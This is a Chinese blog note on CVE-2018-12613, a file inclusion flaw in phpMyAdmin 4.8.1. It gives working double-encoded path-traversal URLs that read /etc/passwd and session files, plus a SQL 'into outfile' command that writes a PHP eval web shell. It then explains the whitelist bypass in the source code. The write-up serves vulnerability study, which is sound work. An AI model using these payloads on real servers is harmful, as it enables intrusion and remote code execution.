CVE漏洞 phpmyadmin 4.81初识

最新推荐文章于 2024-08-03 21:46:55 发布
最新推荐文章于 2024-08-03 21:46:55 发布
阅读量375 收藏
点赞数 3
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/loseheart157/article/details/109345635
版权

文章目录

CVE

CVE 的英文全称是“Common Vulnerabilities &
Exposures”通用漏洞披露。CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称。使用一个共同的名字,可以帮助用户在各自独立的各种漏洞数据库中和漏洞评估工具中共享数据,虽然这些工具很难整合在一起。这样就使得CVE成为了安全信息共享的“关键字”。如果在一个漏洞报告中指明的一个漏洞,如果有CVE名称,你就可以快速地在任何其它CVE兼容的数据库中找到相应修补的信息,解决安全问题。

  • 为每个漏洞和暴露确定了唯一的名称
  • 给每个漏洞和暴露一个标准化的描述
  • 不是一个数据库,而是一个字典
  • 任何完全迥异的漏洞库都可以用同一个语言表述
  • 由于语言统一,可以使得安全事件报告更好地被理解,实现更好的协同工作
  • 可以成为评价相应工具和数据库的基准
  • 非常容易从互联网查询和下载,
  • 通过“CVE编辑部”体现业界的认可

漏洞

漏洞体现

根据该版本CVE漏洞构造URL,在index.php后添加内容,会造成文件包含漏洞。

服务器默认会进行一次url解码,那么%253f就会被解码为%3f,再进行url二次解码后为"?",在进行截取时是db_sql.php?/../../../../../../xxxx?,这样只会截取db_sql.php,是白名单,但最后文件包含的target参数内容是db_sql.php%3f/../../../../../../xxxx ,包含的文件为../../../../../../xxxx

/* 方法一 */
http://localhost:8088/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

/* 方法二 */
http://localhost:8088/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../../Windows/DATE.ini

这样就可以判断是存在漏洞的

漏洞利用

1.执行SQL语句查询数据库路径。

show global variables like "%datadir%";

在这里插入图片描述
2.获取cookie
按下F12,即可找到cooike

在这里插入图片描述

3.获取Session值。

这里需要用到上面用的cooike值,用到了临时文件,提取session

http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_*************(cooike)

windows如下

?target=db_datadict.php%253f/../../../../../../../../../phpStudy/PHPTutorial/tmp/tmp/sess_*******************

4.写入一句话木马

select '<?php @eval($_POST[hcl]) ?>' into outfile '/var/www/html/hcl.php'

漏洞原理

在phpMyAdmin 4.8.1版本的index.php文件中,第50-63行代码如下

$target_blacklist = array (
    'import.php', 'export.php'
);

// If we have a valid target, let's load that script instead
if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target'];
    exit;
}

它的含义是:

1.target传入不能为空
2.target必须是一个字符串
3.target不能以index开头
4.target不能在数组target_blacklist中
5.target经过checkPageValidit检查后为真
前面三个大家都容易理解,第四个判断是黑名单判断。在index.php中已经定义好了target_blacklist的值,它们是import.php和export.php,只要不等于这两个值就可以。

public static function checkPageValidity(&$page, array $whitelist = [])
{
    if (empty($whitelist)) {
        $whitelist = self::$goto_whitelist;
    }
    if (! isset($page) || !is_string($page)) {
        return false;
    }

    if (in_array($page, $whitelist)) {
        return true;
    }

    $_page = mb_substr(
        $page,
        0,
        mb_strpos($page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }

    $_page = urldecode($page);
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    );
    if (in_array($_page, $whitelist)) {
        return true;
    }

    return false;
}

在checkPageValidit中有两个形参,第一个是传入的target,第二个whitelist则有默认形参,也就是空的数组。进入函数首先会判断whitelist是否为空,如果为空则将定义的goto_whitelist赋值给whitelist(因为确实为空,我们只传进去一个target)。接着我们来看看goto_whitelist的代码

public static $goto_whitelist = array(
        'db_datadict.php',
        'db_sql.php',
        'db_events.php',
        'db_export.php',
        'db_importdocsql.php',
        'db_multi_table_query.php',
        'db_structure.php',
        'db_import.php',
        'db_operations.php',
        'db_search.php',
        'db_routines.php',
        'export.php',
        'import.php',
        'index.php',
        'pdf_pages.php',
        'pdf_schema.php',
        'server_binlog.php',
        'server_collations.php',
        'server_databases.php',
        'server_engines.php',
        'server_export.php',
        'server_import.php',
        'server_privileges.php',
        'server_sql.php',
        'server_status.php',
        'server_status_advisor.php',
        'server_status_monitor.php',
        'server_status_queries.php',
        'server_status_variables.php',
        'server_variables.php',
        'sql.php',
        'tbl_addfield.php',
        'tbl_change.php',
        'tbl_create.php',
        'tbl_import.php',
        'tbl_indexes.php',
        'tbl_sql.php',
        'tbl_export.php',
        'tbl_operations.php',
        'tbl_structure.php',
        'tbl_relation.php',
        'tbl_replace.php',
        'tbl_row_action.php',
        'tbl_select.php',
        'tbl_zoom_select.php',
        'transformation_overview.php',
        'transformation_wrapper.php',
        'user_password.php',
);

接着分析代码,如果page在白名单中就会直接return true,但这里考虑到了可能带参数的情况,所以有了下面的判断。

代码中,mb_strpos函数是查找string在另一个string中首次出现的位置。_page变量是获取page问号前的内容,是考虑到target有参数的情况,只要_page在白名单中就直接return true。但还考虑了url编码的情况,所以如果这步判断未成功,下一步又进行url解码。

当传入二次编码后的内容,会让checkPageValidity()这个函数返回true,但index中实际包含的内容却不是白名单中的文件。

例如:传入“?target=db_datadict.php%253f ”,由于服务器会自动解码一次,所以在checkPageValidity()中,page的值一开始会是“db_datadict.php%3f”,又一次url解码后变成了“db_datadict.php?”,这时符合了?前内容在白名单的要求,函数返回true。

但在index.php中_REQUEST[‘target’]仍然是“db_datadict.php%3f”,而且会被include,通过目录穿越,就可造成任意文件包含。最终通过该漏洞实现了上述攻击,

h0ld1rs
关注
专栏目录
PhpMyAdmin漏洞介绍
weixin_45253622的博客
03-19 3390
获取网站绝对路径,
python爬取阿里cve漏洞库信息
W983079520的博客
08-28 2634
水一篇爬取阿里漏洞库信息的文章,有好几周没写爬虫了,在爬取时感觉还是xpath爬取高效些,但是用的正则匹配(re库,python内置),正则虽说在写匹配样式时比较繁琐但是精确匹配还是得用它,只 爬取第1页信息,没有使用多线程或者异步进程,更没有选择将数据持久化到数据库。还是懒,后面会把爬取全部页面的源码及多线程和持久化加进去,先这样了! # @Time : 2021/8/27 21:56 # @Author : huhu-Z # @File : ali_cvd_detail.py # -...
phpMyadmin各版本漏洞
aiquan9342的博客
10-04 1113
一: 影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG   概述:PhpMyAdmin存在PREGREPLACEEVAL漏洞   利用模块:exploit/multi/http/phpmyadminpregreplace CVE: CVE-2013-3238 二: 影响版本:phpMyAdmin v3.5....
phpMyAdmin 漏洞复现教程
2201_75891821的博客
08-03 514
然后我们更改日志保存路径然后查看是否更改成功 显示 更改成功然后我们插入一句话木马访问一下木马然后使用工具连接。
PhpMyAdmin文件包含漏洞
weixin_43622525的博客
02-28 1769
目录 漏洞描述 漏洞复现 复现 解决方法 漏洞描述 PhpMyAdmin 是一个用 PHP 编写的免费软件工具,旨在通过 Web 处理 MySQL 的管理。该漏洞在index.php中,导致文件包含漏洞。 在phpMyadmin4.8.x版本中,程序没有严格控制用户的输入,攻击者可以利用双重编码绕过程序的白名单限制,造成 LFI(本地文件包含)漏洞。 受影响的系统版本为phpMyadmin4.8.0和phpMyadmin4.8.1。漏洞编号 CVE-2018-12613。 漏洞复现
CVE-2018-12613 Phpmyadmin文件包含漏洞
weixin_51339377的博客
03-17 592
phpMyAdmin文件包含漏洞 利用条件: phpMyAdmin 4.8.0-4.8.1版本 用户已经拥有登录进入phpmyadmin后台的账号和密码 phpmyadmin配置文件位置 WWW\phpMyAdmin4.8.0\libraries\config.default.php 以下情况下攻击者在phpmyadmin中被重定向和加载,以及对白名单页面进行不正确的测试不需要身份验证: $cfg['AllowArbitraryServer']=true #攻击者可以指定.
phpmyadmin漏洞汇总
m0_64481831的博客
05-27 1708
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
requests库爬取信息安全漏洞门户网站的CVE漏洞信息.zip
最新发布
08-05
requests库爬取信息安全漏洞门户网站的CVE漏洞信息.zip
cve-search:cve-search-一种对已知漏洞执行本地搜索的工具
02-25
cve-search是一种工具,可将CVE(常见漏洞和披露)和CPE(通用平台枚举)导入MongoDB中,以方便CVE的搜索和处理。 该软件的主要目的是避免对公共CVE数据库进行直接和公共查找。 本地查询通常更快,您可以通过...
Seebug、structs、cve漏洞实时监控推送系统.zip
08-05
Seebug、structs、cve漏洞实时监控推送系统.zip
python-cpe-parser:从 NVD (NIST) CVE 漏洞解析 CPE 漏洞
06-25
从 NVD (NIST) CVE 漏洞解析 CPE 漏洞树 给定从 CVE 漏洞页面获取的 HTML 块,将 CPE 漏洞树解析为 VTunit 对象。 去做: 排序 CPE 条目 删除多余的条目 构建__lt__, __le__, __gt__, __ge__方法进行比较 构建一个...
phpmyadmin 远程文件包含漏洞CVE-2018-12613)
a1b2c3是弱口令
12-13 1535
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞漏洞记录 漏洞编号:CVE-2018-12613 受影响版本:phpMyAdmin 4.8.0和4.8.1受到影响。 利用条件: 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServ...
phpmyadmin SQL注入 漏洞CVE-2020-5504)
xy_wjyjw的博客
10-31 610
输入 select @@datadir(查询数据库的路径),根据镜像给的信息(后台路径和用户名密码)进行访问并登录。所以网站绝对路径为/var/www/html/pma。输入 select @@basedir(查询。使用传入的参数cmd传入值,获取flag。phpmyadmin SQL注入。返回数据包3kib,一看就有东西。登录成功进入后台,点击sql。
最全phpmyadmin漏洞汇总
m0_67402013的博客
07-31 9696
phpMyAdmin是一个用php编写的免费软件工具,旨在通过Web友好界面处理MySQL的管理。phpMyAdmin支持对MySQL和MariaDB数据库的广泛操作。经常使用的操作(有如管理数据库、表、列、关系、索引、用户、权限等)可以通过用户界面执行,当然您也可以直接执行任何SQL语句。从1998年发布第一版,到目前发布的最新版为5.1.1,全部历史版本说明phpMyAdmin5.2未来版本与PHP7.2及更高版本和MySQL/MariaDB5.5及更高版本兼容。1、1、条件。...
phpMyAdmin 漏洞利用
lendq的Blog
02-08 2464
国内 很多 网址 都 喜欢 使用phpMyAdmin来 管理 MySQL数据库 而且多数 可以 通过phpMyAdmin 完全操控Mysql数据库。 phpMyAdmin功能常强大 可以执行 操作系统 命令,导入或者导出数据库 一般会存在Root密码过于简单,代码泄露``Mysql配置等漏洞 通过一些技术手段 ,多数能获取网站webshell,甚至是服务器权限。 phpMyAd...
phpmyadmin 4.8.1 远程文件包含漏洞CVE-2018-12613)复现
ximo的博客
03-22 1029
CVE-2018-12613 简介: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 搭建环境: 使用docker+vulhub的环境。 复现过程: 访问: index.php?target=db_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd 可以查看到文件信息: 说明存在文件包含。 在sql中执行SELECT '<?=phpinfo()?&gt
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 605
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 3180
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
phpmyadmin-文件包含漏洞代码审计过程(超详细)
qq_59020256的博客
01-26 1297
phpmyadmin-文件包含漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值